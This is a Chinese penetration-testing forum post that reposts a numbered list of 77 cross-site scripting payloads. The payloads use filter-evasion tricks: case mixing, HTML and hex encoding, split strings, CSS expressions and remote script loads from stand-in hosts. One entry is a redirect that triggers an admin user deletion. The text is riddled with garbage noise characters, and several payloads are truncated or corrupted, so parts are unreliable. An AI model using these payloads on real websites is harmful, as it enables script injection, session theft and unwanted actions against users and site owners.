中国网络渗透测试联盟

标题: XSS攻击汇总 [打印本页]

作者: admin    时间: 2013-4-19 19:22
标题: XSS攻击汇总
貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。
, {4 M8 y% A8 {$ e(1)普通的XSS JavaScript注入9 f1 E, J$ z2 d- _; F$ |' H
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
; h, R* ]4 ^' A) ^$ z" H(2)IMG标签XSS使用JavaScript命令  a* x3 ~4 e$ t; }3 c9 ]$ j1 ~
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
1 n. m9 a' a6 l* D(3)IMG标签无分号无引号
7 I8 c" F9 A3 `; ?' G  V$ Y<IMG SRC=javascript:alert(‘XSS’)>
  C- K3 H, Y- d0 {(4)IMG标签大小写不敏感/ J, W, w( E- m' [, U: U
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
0 _! Z; y# Y2 @5 j: Z( W4 a* |(5)HTML编码(必须有分号)
; x9 i" I) O* n: P  O<IMG SRC=javascript:alert(“XSS”)>
. R" \  p- y% U4 O6 s5 \/ x/ @(6)修正缺陷IMG标签9 {! m5 a! f" ~, D
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>. W) O6 _2 W( c2 M; r2 x
6 V1 Y* O4 c, ~4 d" R5 y. f
: b7 C" ?0 p1 O! x; `6 V
(7)formCharCode标签(计算器)3 M1 k  a( [, E6 q0 T) c. \5 }
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>; `* ?7 v; `! q
(8)UTF-8的Unicode编码(计算器)# I% x; ?" v( |6 f$ b' ]  J
<IMG SRC=jav..省略..S')>
& `4 g* `7 K7 g(9)7位的UTF-8的Unicode编码是没有分号的(计算器)+ l' E: Q$ W, w" J5 V
<IMG SRC=jav..省略..S')>8 m5 r6 G* _' d, L- w! i
(10)十六进制编码也是没有分号(计算器)
& \# w% o5 M0 `: H" x9 u. U" ?9 C# A<IMG SRC=&#x6A&#x61&#x76&#x61..省略..&#x58&#x53&#x53&#x27&#x29>8 ^9 d" n: u" e7 L9 [
(11)嵌入式标签,将Javascript分开) x& w2 G2 z" Y9 E* V' m1 R; U
<IMG SRC=”jav ascript:alert(‘XSS’);”>4 |5 b! n* s% M2 E( V2 ^7 ^' B
(12)嵌入式编码标签,将Javascript分开+ x! d, D1 k7 J: b# J2 i
<IMG SRC=”jav ascript:alert(‘XSS’);”>
+ o9 c! h/ D* a) j6 {4 M. r(13)嵌入式换行符! F- i% }6 Z5 l' h) _( G0 J% C
<IMG SRC=”jav ascript:alert(‘XSS’);”># p6 J5 W7 I# N2 f
(14)嵌入式回车
( ?! _; s' T% Z5 h/ J<IMG SRC=”jav ascript:alert(‘XSS’);”>; Z: C  }5 w8 @& B5 i2 E+ N5 L
(15)嵌入式多行注入JavaScript,这是XSS极端的例子; L3 \, a+ q" V, c0 ~
<IMG SRC=”javascript:alert(‘XSS‘)”>
- n$ J& O$ D; M; R(16)解决限制字符(要求同页面)+ N6 C$ A: B' H! M3 N' g. |
<script>z=’document.’</script>$ _+ T& j+ _) ~- c9 K
<script>z=z+’write(“‘</script>& G/ X, k5 \4 P/ a8 e3 n. q5 k
<script>z=z+’<script’</script>
& X# }4 y! _) b<script>z=z+’ src=ht’</script>
) j9 m' A* N7 {8 G1 n- s1 t% u<script>z=z+’tp://ww’</script>
& M6 V! n. D5 _0 v0 e<script>z=z+’w.shell’</script>
# x; W' u, [& ~) w3 s8 Q<script>z=z+’.net/1.’</script>. C, [( R; r- {9 d5 z
<script>z=z+’js></sc’</script>) @6 X$ ^1 H! j- ]( B$ S
<script>z=z+’ript>”)’</script>" `& M& K* `0 z
<script>eval_r(z)</script>
, ?! v. ]3 ^1 e) ^8 n7 @# [(17)空字符12-7-1 T00LS - Powered by Discuz! Board0 u" c8 d$ Q0 ?( i/ u& i
https://www.t00ls.net/viewthread ... table&tid=15267 2/6, \% v9 X$ r# F: ^0 A" f
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out; f; b( q: M& P% c) v
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
( T& ?& J! V( }3 D' U. T& Pperl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
0 T6 M* [0 U& X% q7 l: `+ V) i(19)Spaces和meta前的IMG标签6 |3 D/ C7 D, I7 O2 T
<IMG SRC=” javascript:alert(‘XSS’);”>
7 [% b" M1 r- U7 I(20)Non-alpha-non-digit XSS
9 Z  `! C) K  C<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
5 C. \5 n( u% v5 d: J7 h8 c# V(21)Non-alpha-non-digit XSS to 21 f# o1 M* T% b9 ?  t0 d
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
$ R* s9 y0 k# g, j; Z; S- Q(22)Non-alpha-non-digit XSS to 3
0 p! A# S( b. u8 Y- A6 Z+ M* D# T<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
4 h8 J1 [0 u- b& l$ _/ b3 C(23)双开括号
8 m% J! T' V# T( E1 y  M  G<<SCRIPT>alert(“XSS”);//<</SCRIPT>
/ Z& U& M( ?% K9 g8 ], a(24)无结束脚本标记(仅火狐等浏览器)
$ e0 ?5 Q* X  S! \4 T* a2 j<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>% P  A3 H# B6 h$ c0 r" `
(25)无结束脚本标记2. S+ i$ g# h4 Y
<SCRIPT SRC=//3w.org/XSS/xss.js>
  j* m1 d9 ^0 V7 n. N- _; v(26)半开的HTML/JavaScript XSS
$ h: G/ _" m/ z( Z; ~# E6 a<IMG SRC=”javascript:alert(‘XSS’)”, q% ]" w3 k4 \& n  B! b8 U
(27)双开角括号
7 ?, Y) @* i) F0 V/ y# P% k; z<iframe src=http://3w.org/XSS.html <; T9 l% @7 m9 x3 T1 E
(28)无单引号 双引号 分号  _8 D) t5 u6 g, D! L  h+ [
<SCRIPT>a=/XSS/" g. H% \; |+ H( ]1 ]: z: w
alert(a.source)</SCRIPT>
' ]7 V8 W$ L# @; v- K; r4 `(29)换码过滤的JavaScript
8 x. ]" c# i& O2 R\”;alert(‘XSS’);//: B6 \. O2 I5 `" E+ z) z
(30)结束Title标签% c8 r! a" q+ a* h! q% z
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
% ]7 s4 u. ^# a9 \1 P, I(31)Input Image8 |, Q1 x1 X0 b8 c6 q
<INPUT SRC=”javascript:alert(‘XSS’);”>
+ W9 l7 K- T' S( _8 p(32)BODY Image' X- t3 {6 w: r* |. q  _2 x- G
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
+ Z7 q/ E! w- f(33)BODY标签. t$ |: B: X5 B
<BODY(‘XSS’)>9 B$ V5 z% M+ b3 o; p9 M+ n
(34)IMG Dynsrc; F+ M) G9 z5 Q# f/ @
<IMG DYNSRC=”javascript:alert(‘XSS’)”>
0 C  |2 I7 ^0 }(35)IMG Lowsrc( }. \. {) J  v' w: }$ a  a. G
<IMG LOWSRC=”javascript:alert(‘XSS’)”>5 O9 y! ?+ M, w' @8 t
(36)BGSOUND
6 ]5 S0 ?/ E+ a: n8 Y/ _" o<BGSOUND SRC=”javascript:alert(‘XSS’);”>
( k4 U% @7 z; n2 k4 l6 C# G(37)STYLE sheet0 ~( _! \3 Q+ W
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>5 P6 @; ?6 C- Z
(38)远程样式表
' e/ J0 R( F& W! p5 o0 |% I<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>( Y6 J3 F, S8 z
(39)List-style-image(列表式)8 [3 R+ @& i" O/ K/ j
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS! R: U* K+ t+ Y* W4 X, z+ D
(40)IMG VBscript
- G3 g: I* o: r+ X) w3 J<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS
8 x+ v4 y; c0 z% y8 g+ s(41)META链接url
0 E- T0 ^: H" j. J' a
& {! l) R/ _2 s5 w0 E
$ I/ u; _/ ^0 V3 \/ ]% ~<META HTTP-EQUIV=”refresh” CONTENT=”0;
' x  P4 m" W5 E$ ]1 ]2 i/ XURL=http://;URL=javascript:alert(‘XSS’);”>) J5 f4 ?8 P7 M; L. }( ~
(42)Iframe9 {8 |- l4 q# _; H
<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME># k* u8 ]( u# |* j" D4 D' X
(43)Frame+ s5 t8 j: T6 E0 L: o% {- R
<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>12-7-1 T00LS - Powered by Discuz! Board  c/ Y/ y( _8 _* c9 X3 I
https://www.t00ls.net/viewthread ... table&tid=15267 3/6
  M1 r) F- D& [& _1 Q(44)Table5 R5 c" H5 [* u
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>% ?( h% E* H2 O8 c# Y# n
(45)TD/ d( I/ Q7 w2 P/ [2 a
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
- P- Q7 X0 D% v7 J) w(46)DIV background-image
3 K/ ?( k6 {5 n; M1 g' e4 G+ ?<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>% `# D* s3 }/ a' _
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-) _" x: j* z  N, Q1 ?7 O
8&13&12288&65279)' B# n9 h+ Y+ G$ P
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>. P: p+ k3 L& I8 u9 A
(48)DIV expression. R' ~- g2 e# e7 T) X7 j
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
0 p2 h- d# u5 \" [) ^! n$ Y(49)STYLE属性分拆表达
; ?2 N, A9 U: u3 `& U& @<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
. U) J( G0 L" ^(50)匿名STYLE(组成:开角号和一个字母开头); l4 V9 _1 X$ G8 F6 h, g
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
( F# N$ O% ^, o- J( e(51)STYLE background-image1 u# a( G6 ?/ d
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A
: h0 G4 @: V5 ]1 ^+ uCLASS=XSS></A>8 t0 Q' E4 h; z8 I
(52)IMG STYLE方式0 N# X* t2 A: P! z
exppression(alert(“XSS”))’>
( }( J1 r1 N: |! i2 D' R) j(53)STYLE background( v1 w4 d& n" o$ V* W8 Z
<STYLE><STYLE8 y9 l3 I7 m: k( N5 G/ o
type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>% z. _3 F% n: s
(54)BASE
6 l( }' Z/ t* J, S" Y<BASE HREF=”javascript:alert(‘XSS’);//”>
9 `2 Y: g( s0 D% H9 `4 h9 B! k(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS( ]* n7 I2 \7 d: W" o/ @, d
<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>
9 H6 ]2 Y* T4 z) _' R% W(56)在flash中使用ActionScrpt可以混进你XSS的代码
, e0 b# k* H/ Sa=”get”;
- J) y8 k- Z: Q9 @b=”URL(\”";
2 [7 J3 l8 \" f. ~0 [c=”javascript:”;6 k. V1 j' m0 L9 N3 H! W
d=”alert(‘XSS’);\”)”;
* i; ~; V; V- d6 {; n) eeval_r(a+b+c+d);
0 _* W) b5 s8 `( ~(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上
% [) }$ m1 P1 A' w<HTML xmlns:xss>3 r' |* `# C' ]) `) J+ d- q  ]' `9 L
<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>
& S& W4 ]% C6 }<xss:xss>XSS</xss:xss>
, j; \: G9 M# k, N8 \% S</HTML>
: I. Z) N  r+ w5 b(58)如果过滤了你的JS你可以在图片里添加JS代码来利用
" S0 i6 z6 X' `% a. `<SCRIPT SRC=””></SCRIPT>
# g7 n1 L4 m- o' V( h9 w) N(59)IMG嵌入式命令,可执行任意命令
7 i- D8 O- n: R$ [. W! X* ^<IMG SRC=”http://www.XXX.com/a.php?a=b”>' f% s: y' r2 q; o4 t5 B* B( I7 S1 {* N
(60)IMG嵌入式命令(a.jpg在同服务器)
! a: k: M, E5 l, URedirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser6 [3 W8 `" k# i/ R/ R, w: Q5 x4 X
(61)绕符号过滤
; v, l5 K2 l3 D1 w# ]# O# `" I<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>
0 }7 |4 N- c3 J% E(62)% j3 }& T3 e! G9 k9 B
<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>
3 B' M5 X9 e- w% T6 c0 g(63): N9 s0 i. L8 |1 \  h
<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>& F' F' a+ F& n4 ^/ U) R
(64)
  i! L7 V* N  c- D0 o  w<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>6 `4 I/ n$ R$ m) n8 U( n( y
(65)! @! Z" e6 K6 N; ^# ?
<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>+ t) @# M# u0 t" Z! b0 w
(66)12-7-1 T00LS - Powered by Discuz! Board
: x& O6 U8 Y/ thttps://www.t00ls.net/viewthread ... table&tid=15267 4/6. t% X" O% q0 m8 D
<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>( v3 a1 k6 |% H
(67)
+ M. x4 O0 {3 z: X<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”>( V% n3 Y# ^) {% _( G; }
</SCRIPT>
. B: l1 x$ }- l( w" }1 E/ {(68)URL绕行7 b1 g, j% {4 I) K; q' h
<A HREF=”http://127.0.0.1/”>XSS</A>* t0 m% |) v0 S. k0 x
(69)URL编码
4 e, N) S, a) ~0 {<A HREF=”http://3w.org”>XSS</A>
& P: {1 R" Y7 x3 l$ f% Z! y(70)IP十进制1 v. ]' K- U* m7 H/ T0 F
<A HREF=”http://3232235521″>XSS</A>
5 k) z7 P* ^* x! e(71)IP十六进制
+ Y, \( y- Y8 D5 w( w7 y) n<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>+ V% U. \' h- n% F9 }
(72)IP八进制
) h5 U0 @5 X/ w9 x5 A( S$ h<A HREF=”http://0300.0250.0000.0001″>XSS</A>
+ S, K1 R% w" {0 G0 r* R( p9 i$ [(73)混合编码
* @6 ^  b' F8 p  o9 @<A HREF=”h$ o* V- L8 e0 C% |
tt p://6 6.000146.0×7.147/”">XSS</A>2 v4 g2 _, l$ W: M8 g1 w( p
(74)节省[http:]
! S( H' r: f, H$ o<A HREF=”//www.google.com/”>XSS</A>; u, N1 S& }* ~. W
(75)节省[www]. F& ]5 F; j; n2 [( B' H
<A HREF=”http://google.com/”>XSS</A>
# E* H4 j, i* C8 e8 c(76)绝对点绝对DNS/ c* ]4 }# a6 M1 [# J) K( a
<A HREF=”http://www.google.com./”>XSS</A>
1 l/ \+ L& a  W: Q  ^) f(77)javascript链接
1 E; Z0 z7 s% [: F2 G8 e8 \<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>* W' r# A. F/ ]/ ]9 [! e4 H" y
" c" V( f+ j/ S9 H
原文地址:http://fuzzexp.org/u/0day/?p=14
5 P* @" Y, ?) V7 k
, B: K9 X$ I, D# z2 {. n' a




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2